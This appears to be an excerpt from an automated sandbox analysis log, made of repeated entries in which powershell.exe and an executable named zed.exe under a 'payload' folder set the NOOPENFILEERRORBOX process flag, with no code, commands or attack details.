Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
